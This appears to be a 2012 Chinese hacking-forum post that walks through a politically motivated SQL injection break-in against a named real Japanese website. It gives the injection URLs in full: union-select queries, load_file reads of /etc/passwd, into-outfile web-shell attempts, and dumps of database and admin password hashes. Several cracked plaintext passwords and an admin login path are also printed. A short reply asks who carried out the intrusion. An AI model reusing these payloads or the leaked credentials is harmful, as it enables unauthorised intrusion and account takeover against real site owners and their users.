找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 4238|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
  l6 Q0 {( H' S/ a3 T- |5 e) L
. `+ o( f5 m* x. a+ N* J" r/ O% L
0x01. 检测 www.zuaa.jp 收集数据9 @0 P" s8 T- _, @

! x% Q0 ?7 Q+ O* r; j+ E0 z1 G$ _% A- Z  t1 {
whatweb1 R# T* v8 y, H, t$ ]" t

& W0 \, e. _3 W1 l. R7 f  N* `/ R5 s7 X1 G: c5 A
利用NMAP扫描
! D8 T9 x% d4 Q5 g" O! J9 e. q# _5 E; s$ _  L* J8 d0 E* Z( s1 j
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* G  `1 j0 G) `! e5 g0 `& Y
0x02.找注入点" I! [. S# A% e. [1 j
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 }- ?  \1 P- y/ L/ F6 x0 O- ^2 U6 C/ A$ x6 r3 ~4 H

" k2 I' w- e4 G, n% x0x03.order by
/ V7 O2 u3 F. o1 D6 K2 z             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
( B" J7 `1 s0 B( d0 [( a( O6 G- y' }! l8 r7 |* I1 o0 |$ [6 @4 }
order by 28报错,order by 27正常
: `6 X$ P2 z) l: t* [+ Y) A' o5 V
0x04.   union手动查询' a8 I9 b* I) U6 [8 J2 K
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" v7 c! d4 B4 U6 K' A$ {添加到 27 时正常显示
& ^; L- }' a+ X& z- S: `5 l, o: v0 m% m# `+ X! x5 n, l
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持: }9 a# t; N5 T3 y( Y2 Z2 M
- \6 k- b! D) |1 W# M0 O
0x05. info:
: e' F6 v! G9 q1 Xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 6 K' g% g0 J( e4 V$ s9 t
8 h- a, x  u" e
user:            root@localhost
/ c0 R& G' v& w. Bdatabase:    openpne
3 n" \! m* }) `, ]/ M6 gversion:      4.1.22% N3 Z( s% t3 @, X7 p% w0 r) k
os:             portbld-freebsd5.4
" ~1 T# O# Q# C! I* i6 R' l9 l( A0 h7 ^6 V5 g; v+ W+ F
0x06. root用户
- ^: P/ B% _+ o% b% `8 E利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
% n) o4 ]) L! \http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+ V' k1 D8 E. l; L) A2 [1 M) ~- j( Y
通过工具转换
6 s/ ]3 a. ?3 p  t
$ [  I0 d1 k. i. i/ [中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持" p! V6 Y0 w$ n& i' E; {: n6 P* B: e

% L6 [) z3 ^. W9 k$ \0x07. 利用 into outfile
* i0 U1 c, i# j$ S全部都失败
" |5 n& R6 a' n" m8 P# g( Nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php* i. H5 K! w4 F" A2 v2 N! p
# {, |9 Q9 z( l7 U3 r
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
" |/ }$ F2 {( ^1 S5 K; \
5 ^' ]6 X( f8 G2 z3 ^% a1 w页面显示“MDB2 Error:syntax error”
) E6 p% C1 U5 I
# ?/ S; X8 I, y" k. `0x08. 利用 mysql 4.11 w& p# D1 s* k+ Y6 C1 N7 W" u( v% r
猜常规表名,字段未果 工具 sqlmap; o, X# I! _2 l5 }' o+ G- @2 t
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% `" e* V& d% L* e/ r# u9 ^: s) Z, k! X; Z9 a
9 c; P$ Z, ~/ h( g; n( c" `" j" t+ n7 l

" W% J' f3 a  w1 q0x09. 查找后台
4 A) [, J. j; {5 ?, K& Q  ^利用 现有的各种 后台工具尝试都不行
0 W4 ?0 m1 U( @% @( r2 g7 n6 e$ a0 [+ W% h: Y9 C
0x10.  MySL外联方法. u! |9 w1 Q5 V$ N
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行! {. n( R' p, m& M
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
8 a8 f3 q- `. `5 \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user4 j& ?3 w- V+ z- m5 p
( y/ v6 t/ {3 ~
这个可以在 www.cmd5.com 解密* C* p! U% J0 l: N$ p+ w
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20097 G) L( T+ Y' z
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' d& n, K9 ~. N; R/ t, Kopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???6 i; |7 Q1 M* X' P
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???0 c. q1 B' d9 Q
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
) v+ G: u6 I) h# I! y3 q3 D8 F2 u* Y/ o+ [+ U# Z  \$ P
& k0 Y& ^: Y: K# H1 D
0x11. 网站突破  B0 f( L0 J/ n' l( }2 E! o; L
发现网站的源程序 openpne, google 下载 openpne 源码
4 o: q9 j% X1 s% b  N
8 s* P/ ?3 J2 ^% B  g( n. t6 Q$ l3 Z" j, x5 o" _
0x12. 默认信息利用
% K9 U$ ^7 R5 n) N. x, Nhttp://sns.zuaa.jp/?m=admin&a=page_login/ e4 e; F3 ]$ w# Q
" e7 U, ^' S5 a, B- p
表名 (c_admin_user) ,字段名(username,password)5 |2 n( u& h# n! o% w
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
9 `+ ?8 @2 O  H* }& L' W9 P5 w' O' o0 b
解密/ N& G" ^, n& s: z; u. c
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
* I1 J6 b( S0 x, v) W; N, dzuaajp:c0923ec5857796a393da99905008c176,          zju1897
$ }2 `2 l2 W7 o( f5 ^3 X0 I) _8 _, _) J: a+ l! n
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持% ]* S8 ~/ |( [+ I+ [6 g9 z, c9 m
9 P) b: a4 K! B7 ^: _$ S8 v
0x13. 登录后台
* }* p* }; d; N7 Q3 g: \3 ?' t1 _" r$ s& H

' t( l" X% T0 s+ W( i7 I- [* f1 O2 M+ Q
0x14. 小结8 _) K, G$ |4 [1 ^' ~
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。) y: ^2 w  C% b$ @* Y3 k
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点/ \" F0 b2 _1 C& U$ u  y! O
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
( r0 b  ^4 H$ A) z中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持' z5 ^) H! R, O) m  `  G

. x8 a9 a% _& E0 I4 K- \最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
8 _1 W$ i9 o! V# F* _6 a8 a# p

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表